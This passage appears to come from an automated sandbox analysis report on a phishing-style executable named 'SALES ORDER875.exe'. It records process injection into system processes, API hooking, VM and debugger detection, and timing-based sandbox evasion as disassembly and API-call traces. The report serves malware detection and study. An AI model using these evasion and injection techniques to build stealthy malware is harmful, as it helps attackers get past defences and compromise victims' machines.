          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006CE9B2 push dword ptr [0ECCDC24h]; ret 1_2_006CEACE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006CE992 push dword ptr [08CCB4BEh]; ret 1_2_006CE9AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006C6A81 pushfd ; retf 1_2_006C6A82
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006C7008 pushfd ; retf 1_2_006C700F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006C71EF push ds; iretd 1_2_006C71FD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006CD475 push eax; ret 1_2_006CD4C8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006CD4CB push eax; ret 1_2_006CD532
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006CD4C2 push eax; ret 1_2_006CD4C8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006CD52C push eax; ret 1_2_006CD532
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006C77BF push B417C20Bh; ret 1_2_006C77C4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006C7ABC push edi; ret 1_2_006C7ABD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316EB1E push esp; retn 0000h1_2_0316EB1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316EB02 push esp; retn 0000h1_2_0316EB03
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E9B5 push esp; retn 0000h1_2_0316EAE7
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4CDB02 push esp; retn 0000h3_2_0E4CDB03
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4CDB1E push esp; retn 0000h3_2_0E4CDB1F
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4CD9B5 push esp; retn 0000h3_2_0E4CDAE7
          Source: C:\Windows\explorer.exeCode function: 3_2_0E663B02 push esp; retn 0000h3_2_0E663B03
          Source: C:\Windows\explorer.exeCode function: 3_2_0E663B1E push esp; retn 0000h3_2_0E663B1F
          Source: C:\Windows\explorer.exeCode function: 3_2_0E6639B5 push esp; retn 0000h3_2_0E663AE7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00DD225F pushad ; ret 4_2_00DD27F9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00DD27FA pushad ; ret 4_2_00DD27F9

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE9
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_0039F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0039F98E
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_00411C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00411C41
          Source: C:\Users\user\Desktop\SALES ORDER875.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\SALES ORDER875.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-97003
          Source: C:\Users\user\Desktop\SALES ORDER875.exeAPI/Special instruction interceptor: Address: 1A90F44
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 6B9904 second address: 6B990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 6B9B6E second address: 6B9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 1D9904 second address: 1D990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 1D9B6E second address: 1D9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E rdtsc 1_2_0327096E
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4427Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 5510Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 872Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 880Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeWindow / User API: threadDelayed 9838Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\SALES ORDER875.exeAPI coverage: 3.5 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 2.0 %
          Source: C:\Windows\SysWOW64\netsh.exeAPI coverage: 1.5 %
          Source: C:\Windows\explorer.exe TID: 4308Thread sleep count: 4427 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 4308Thread sleep time: -8854000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 4308Thread sleep count: 5510 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 4308Thread sleep time: -11020000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 2872Thread sleep count: 134 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 2872Thread sleep time: -268000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 2872Thread sleep count: 9838 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 2872Thread sleep time: -19676000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003F68EE FindFirstFileW,FindClose,0_2_003F68EE
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_003F698F
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003ED076
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003ED3A9
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003F9642
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003F979D
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_003F9B2B
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_003EDBBE
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003F5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_003F5C97
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003842DE
          Source: explorer.exe, 00000003.00000002.4137170074.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000003.00000002.4135604265.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000003.00000002.4135604265.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000003.00000002.4130863313.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
          Source: explorer.exe, 00000003.00000002.4137170074.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000003.00000000.1839005711.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000003.00000002.4130863313.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.1845154888.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000002.4130863313.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000003.00000002.4135604265.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: explorer.exe, 00000003.00000002.4135604265.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4135604265.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000000.1845154888.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000003.00000002.4135604265.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000003.00000000.1839005711.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000003.00000000.1839005711.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E rdtsc 1_2_0327096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272B60 NtClose,LdrInitializeThunk,1_2_03272B60
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003FEAA2 BlockInput,0_2_003FEAA2
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003B2622
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003842DE
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003A4CE8 mov eax, dword ptr fs:[00000030h]0_2_003A4CE8
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_01A911B0 mov eax, dword ptr fs:[00000030h]0_2_01A911B0
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_01A91210 mov eax, dword ptr fs:[00000030h]0_2_01A91210
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_01A8FBA0 mov eax, dword ptr fs:[00000030h]0_2_01A8FBA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03308324 mov eax, dword ptr fs:[00000030h]1_2_03308324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03308324 mov ecx, dword ptr fs:[00000030h]1_2_03308324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03308324 mov eax, dword ptr fs:[00000030h]1_2_03308324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03308324 mov eax, dword ptr fs:[00000030h]1_2_03308324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C310 mov ecx, dword ptr fs:[00000030h]1_2_0322C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250310 mov ecx, dword ptr fs:[00000030h]1_2_03250310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D437C mov eax, dword ptr fs:[00000030h]1_2_032D437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov ecx, dword ptr fs:[00000030h]1_2_032B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA352 mov eax, dword ptr fs:[00000030h]1_2_032FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D8350 mov ecx, dword ptr fs:[00000030h]1_2_032D8350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330634F mov eax, dword ptr fs:[00000030h]1_2_0330634F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325438F mov eax, dword ptr fs:[00000030h]1_2_0325438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325438F mov eax, dword ptr fs:[00000030h]1_2_0325438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032663FF mov eax, dword ptr fs:[00000030h]1_2_032663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EC3CD mov eax, dword ptr fs:[00000030h]1_2_032EC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B63C0 mov eax, dword ptr fs:[00000030h]1_2_032B63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov ecx, dword ptr fs:[00000030h]1_2_032DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h]1_2_032D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h]1_2_032D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322823B mov eax, dword ptr fs:[00000030h]1_2_0322823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322826B mov eax, dword ptr fs:[00000030h]1_2_0322826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B8243 mov eax, dword ptr fs:[00000030h]1_2_032B8243
